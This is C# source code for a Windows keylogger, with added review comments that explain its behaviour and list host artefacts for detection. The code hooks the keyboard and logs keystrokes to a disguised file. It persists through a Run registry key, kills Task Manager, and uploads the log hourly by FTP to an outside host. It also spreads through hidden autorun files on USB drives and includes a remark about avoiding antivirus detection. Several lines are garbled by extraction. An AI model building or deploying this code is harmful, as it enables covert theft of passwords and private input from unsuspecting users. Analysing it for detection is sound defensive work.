C# Keylogger
System; System.Collections.Generic; System.Text; System.Diagnostics; System.Timers; System.Windows.Forms; System.Runtime.InteropServices; System.IO; System.Net; System.Net.Mail; Microsoft.Win32; System.Threading;
// Declarations and entry point of the keystroke logger (code below is unchanged).
// - WH_KEYBOARD_LL (13) is the hook type passed to SetWindowsHookEx and WM_KEYDOWN
//   (0x0100) is the message HookCallback filters on; the four externs are P/Invoke
//   bindings into user32.dll and kernel32.dll.
// - `path` resolves to "WindowsRuntime.log" under the roaming ApplicationData
//   folder. The name imitates a system component, so triage should match on the
//   full path rather than trust the name.
// - caps and shift are byte flags used by HookCallback; `failed` is not referenced
//   in the visible part of the file.
// - Main installs the hook (SetHook), calls startup(), arms a System.Timers.Timer
//   with Interval 60*60*1000 ms (one hour) bound to OnTimedEvent, then blocks in
//   Application.Run(); UnhookWindowsHookEx is reached only after that loop returns.
// - The second timer (USBSpread every 10000 ms) is commented out in this listing.
// - The author's remark on GC.KeepAlive shows the sample was adjusted after an
//   antivirus product flagged it, so a signature keyed to a single code line is
//   fragile here; behavioural signals (a WH_KEYBOARD_LL hook installed by a binary
//   running from the user profile) are the sturdier detection.
// NOTE(review): the page extraction collapsed the file onto a few lines and split
// some identifiers ("Envir onment", "LowLevelKeyboa rdProc", "IntPt r"); the text is
// kept byte-identical rather than repaired.
namespace keylogger { class Program { private const int WH_KEYBOARD_LL = 13; private const int WM_KEYDOWN = 0x0100; private static LowLevelKeyboardProc _proc = HookCallback; private static IntPtr _hookID = IntPtr.Zero; public static string path = Path.Combine(Environment.GetFolderPath(Envir onment.SpecialFolder.ApplicationData), "WindowsRuntime.log"); public static byte caps = 0, shift = 0, failed = 0; [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboa rdProc lpfn, IntPtr hMod, uint dwThreadId); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool UnhookWindowsHookEx(IntPtr hhk); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPt r wParam, IntPtr lParam); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr GetModuleHandle(string lpModuleName); public static void Main() { _hookID = SetHook(_proc); Program.startup(); System.Timers.Timer timer; timer = new System.Timers.Timer(); timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent); timer.AutoReset = true; timer.Interval = ((60) * (60) * (1000)); timer.Start(); // System.Timers.Timer timer2; // timer2 = new System.Timers.Timer(); // timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread); // timer2.AutoReset = true; // timer2.Interval = 10000; // timer2.Start(); Application.Run(); // GC.KeepAlive(timer); // dont use this line cos avast detects it // GC.KeepAlive(timer2); UnhookWindowsHookEx(_hookID); }
// startup(): persistence. Copies the running executable to "keylogger.exe" in the
// roaming ApplicationData folder (overwrite enabled) and, when no value named
// "WindowsRuntime" exists under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,
// creates one holding that path. Both steps sit in bare catch blocks that only
// print to the console, so failures leave no other trace.
// Host artefacts visible in this code, useful for triage and cleanup: the Run value
// "WindowsRuntime", the copied "keylogger.exe", and the "WindowsRuntime.log" file,
// all per-user (HKCU / roaming profile), so no elevation is involved.
// GetLocalIP(): resolves the local host name with Dns.GetHostEntry and returns the
// last address whose AddressFamily prints as "InterNetwork" (IPv4), or null when
// none is found; OnTimedEvent uses the result to label each upload.
// NOTE(review): the registry path appears as "SOFTW ARE\\..." and several other
// identifiers are split by the page extraction; the text is kept byte-identical.
public static void startup() { //Try to copy keylogger in some folders string source = Application.ExecutablePath.ToString(); string destination = Environment.GetFolderPath(Environment.SpecialFo lder.ApplicationData); destination = System.IO.Path.Combine(destination, "keylogger.exe"); try { System.IO.File.Copy(source, destination, true); source = destination; } catch { Console.WriteLine("No authorization to copy file or other error. "); } //Find if the file already exist in startup try { RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTW ARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); if (registryKey.GetValue("WindowsRuntime") == null) { registryKey.SetValue("WindowsRuntime", destination); } registryKey.Close();//dispose of the Key } catch { Console.WriteLine("Error setting startup reg key."); } } public static string GetLocalIP() { string _IP = null; // Resolves a host name or IP address to an IPHostEntry instance. // IPHostEntry - Provides a container class for Internet host addres s information. System.Net.IPHostEntry _IPHostEntry = System.Net.Dns.GetHostEntry(Sy stem.Net.Dns.GetHostName()); // IPAddress class contains the address of a computer on an IP netwo rk. foreach (System.Net.IPAddress _IPAddress in _IPHostEntry.AddressList ) { // InterNetwork indicates that an IP version 4 address is expect ed // when a Socket connects to an endpoint if (_IPAddress.AddressFamily.ToString() == "InterNetwork") { _IP = _IPAddress.ToString(); } }
// The remaining lines close GetLocalIP and hold OnTimedEvent, SetHook, the hook
// delegate, HookCallback and the start of USBSpread.
// OnTimedEvent(): timer handler. Kills every process whose MainWindowTitle contains
// "Taskmgr.exe", then uploads the log over FTP (WebRequestMethods.Ftp.UploadFile) to
// a URL built from a placeholder host, the local IP and a "yyyy:MM:dd-HH:mm"
// timestamp, using the placeholder credentials "username"/"password", and finally
// empties the log with File.WriteAllText(se, ""). FTP carries both the credentials
// and the captured text in cleartext, so the transfer is visible to network
// monitoring, and credentials compiled into the binary are recoverable by static
// analysis. The GetResponse() call is commented out.
// SetHook(): passes the main module's handle and dwThreadId 0 to SetWindowsHookEx
// with WH_KEYBOARD_LL and returns the hook handle.
// HookCallback(): for nCode >= 0 and WM_KEYDOWN it opens the log with
// File.AppendText, sleeps 80 ms, reads the virtual-key code with Marshal.ReadInt32,
// writes a text token chosen by the switch (shift taken from Control.ModifierKeys,
// caps toggled on Keys.Capital), closes the writer and always forwards the event
// with CallNextHookEx. One open/append/close per key press produces a steady stream
// of small writes to a single file, which is a usable behavioural indicator.
// NOTE(review): in the Keys.D0-Keys.D9 arms the extraction moved the
// `0) sw.Write("n");` halves of each `if (Program.shift == 0)` onto separate lines;
// they are left where the page has them.
// USBSpread(): cut off at the end of this view and referenced only from the
// commented-out timer in Main. The visible part writes an autorun.inf
// ("open=start.exe") to each removable drive, copies the executable there as
// "start.exe" and sets the Hidden attribute on both; hidden autorun.inf/start.exe
// pairs on removable media are the corresponding artefact.
return _IP; } public static void OnTimedEvent(object source, EventArgs e) { Process[] ProcessList = Process.GetProcesses(); foreach (Process proc in ProcessList) { if (proc.MainWindowTitle.Contains("Taskmgr.exe")) { proc.Kill(); } } DateTime date = DateTime.Now.AddMonths(0); string fulltime = date.ToString("yyyy:MM:dd-HH:mm"); FtpWebRequest ftpRequest = (FtpWebRequest)WebRequest.Create("ftp://w ebsite.com/Folder/FileName-" + GetLocalIP() + "--" + fulltime + "-.txt"); ftpRequest.Method = WebRequestMethods.Ftp.UploadFile; //if you want to delete, uncomment the line below, and remove the li ne above //requestFileDelete.Method = WebRequestMethods.Ftp.DeleteFile; ftpRequest.Credentials = new NetworkCredential("username", "password "); byte[] uploadContent; string se = Environment.GetFolderPath(Environment.SpecialFolder.Appl icationData) + "//WindowsRuntime.log"; using (StreamReader readStream = new StreamReader((se))) { uploadContent = Encoding.UTF8.GetBytes(readStream.ReadToEnd()); readStream.Close(); } ftpRequest.ContentLength = uploadContent.Length; using (Stream sendStream = ftpRequest.GetRequestStream()) { sendStream.Write(uploadContent, 0, uploadContent.Length); sendStream.Close(); } //ftpRequest.GetResponse(); File.WriteAllText(se, ""); } private static IntPtr SetHook(LowLevelKeyboardProc proc) { using (Process curProcess = Process.GetCurrentProcess()) using (ProcessModule curModule = curProcess.MainModule) { return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(cu rModule.ModuleName), 0); } } private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, I ntPtr lParam); private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lPar
am) { if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN) { StreamWriter sw = File.AppendText(Program.path); Thread.Sleep(80); int vkCode = Marshal.ReadInt32(lParam); if (Keys.Shift == Control.ModifierKeys) Program.shift = 1; switch ((Keys)vkCode) { case Keys.Space: sw.Write("[SPACE BAR]"); break; case Keys.Menu: case Keys.LMenu: case Keys.RMenu: sw.Write("[ALT KEY]"); break; case Keys.BrowserBack: sw.Write("[BROWSER BACK KEY]"); break; case Keys.BrowserFavorites: sw.Write("[BRWSER FAVOURITES KEY]"); break; case Keys.BrowserForward: sw.Write("[BROWSER FORWARD KEY]"); break; case Keys.BrowserHome: sw.Write("[BROWSER HOME KEY]"); break; case Keys.BrowserRefresh: sw.Write("[BROWSER REFRESH KEY]"); break; case Keys.BrowserSearch: sw.Write("[BROWSER SEARCH KEY]"); break; case Keys.BrowserStop: sw.Write("[BROWSER STOP KEY]"); break; case Keys.ControlKey: case Keys.LControlKey: case Keys.RControlKey: sw.Write("[CTRL]"); break; case Keys.Delete: sw.Write("[DELETE KEY]"); break; case Keys.Return:
sw.WriteLine("[ENTER]"); break; case Keys.Back: sw.Write("[BACK SPACE]"); break; case Keys.Down: sw.Write("[DOWN KEY]"); break; case Keys.End: sw.Write("[END KEY]"); break; case Keys.Escape: sw.Write("[ESCAPE KEY]"); break; case Keys.Execute: sw.Write("[EXECUTE KEY]"); break; case Keys.Insert: sw.Write("[INSERT KEY]"); break; case Keys.LButton: sw.Write("[LEFT MOUSE CLICKED]"); break; case Keys.Left: sw.Write("[LEFT KEY]"); break; case Keys.MButton: sw.Write("[MIDDLE MOUSE CLICKED]"); break; case Keys.LShiftKey: case Keys.RShiftKey: sw.Write("[SHIFT KEY]"); break; case Keys.NumPad0: sw.Write("0"); break; case Keys.NumPad1: sw.Write("1"); break; case Keys.NumPad2: sw.Write("2"); break; case Keys.NumPad3: sw.Write("3"); break; case Keys.NumPad4:
sw.Write("4"); break; case Keys.NumPad5: sw.Write("5"); break; case Keys.NumPad6: sw.Write("6"); break; case Keys.NumPad7: sw.Write("7"); break; case Keys.NumPad8: sw.Write("8"); break; case Keys.NumPad9: sw.Write("9"); break; case Keys.RButton: sw.Write("[RIGHT MOUSE CLICKED]"); break; case Keys.Tab: sw.Write("[TAB]"); break; case Keys.Right: sw.Write("[RIGHT KEY]"); break; case Keys.Up: sw.Write("[UP KEY]"); break; case Keys.D0: if (Program.shift == else sw.Write(")"); break; case Keys.D1: if (Program.shift == else sw.Write("!"); break; case Keys.D2: if (Program.shift == else sw.Write("@"); break; case Keys.D3: if (Program.shift == else sw.Write("#"); break; case Keys.D4: if (Program.shift == else sw.Write("$"); break; 0) sw.Write("0");
0) sw.Write("1");
0) sw.Write("2");
0) sw.Write("3");
0) sw.Write("4");
case Keys.D5: if (Program.shift == else sw.Write("%"); break; case Keys.D6: if (Program.shift == else sw.Write("^"); break; case Keys.D7: if (Program.shift == else sw.Write("&"); break; case Keys.D8: if (Program.shift == else sw.Write("*"); break; case Keys.D9: if (Program.shift == else sw.Write("("); break;
0) sw.Write("5");
0) sw.Write("6");
0) sw.Write("7");
0) sw.Write("8");
0) sw.Write("9");
case Keys.LWin: case Keys.RWin: case Keys.Apps: sw.Write("[Windows Button]"); break; case Keys.OemQuestion: if (Program.shift == 0) sw.Write("/"); else sw.Write("?"); break; case Keys.OemOpenBrackets: if (Program.shift == 0) sw.Write("["); else sw.Write("{"); break; case Keys.OemCloseBrackets: if (Program.shift == 0) sw.Write("]"); else sw.Write("}"); break; case Keys.Oem1: if (Program.shift == 0) sw.Write(";"); else sw.Write(":"); break; case Keys.Oem7: if (Program.shift == 0) sw.Write("'"); else sw.Write('"'); break; case Keys.Oemcomma: if (Program.shift == 0) sw.Write(","); else sw.Write("<"); break; case Keys.OemPeriod: if (Program.shift == 0) sw.Write("."); else sw.Write(">"); break; case Keys.OemMinus: if (Program.shift == 0) sw.Write("-"); else sw.Write("_"); break; case Keys.Oemplus: if (Program.shift == 0) sw.Write("=");
else sw.Write("+"); break; case Keys.Oemtilde: if (Program.shift == 0) sw.Write("`"); else sw.Write("~"); break; case Keys.Oem5: sw.Write("|"); break; case Keys.Capital: if (Program.caps == 0) Program.caps = 1; else Program.caps = 0; break; default: if (Program.shift == 0 && Program.caps == 0) sw.Write((( Keys)vkCode).ToString().ToLower()); if (Program.shift == 1 && Program.caps == 0) sw.Write((( Keys)vkCode).ToString().ToUpper()); if (Program.shift == 0 && Program.caps == 1) sw.Write((( Keys)vkCode).ToString().ToUpper()); if (Program.shift == 1 && Program.caps == 1) sw.Write((( Keys)vkCode).ToString().ToLower()); break; } Program.shift = 0; sw.Close(); } return CallNextHookEx(_hookID, nCode, wParam, lParam); } public static void USBSpread(object source, EventArgs e) { /////////////////////////////////////////////////////////////// /////////////////////// USB spread class ////////////////////// /////////////////////////////////////////////////////////////// //A bit modified string source2 = Application.ExecutablePath.ToString(); System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives(); try { foreach (System.IO.DriveInfo drive in drives) { if (drive.DriveType == DriveType.Removable) { string driveAutorun = drive.Name + "autorun.inf"; StreamWriter sw = new StreamWriter(driveAutorun); sw.WriteLine("[autorun]\n"); sw.WriteLine("open=start.exe"); sw.WriteLine("action=Run VMCLite"); sw.Close(); File.SetAttributes(drive.Name + "autorun.inf", File.GetA ttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden); try { File.Copy(source2, drive.Name + "start.exe", true); File.SetAttributes(drive.Name + "start.exe", File.Ge tAttributes(drive.Name + "start.exe") | FileAttributes.Hidden); } finally { Console.WriteLine("Removable device rooted");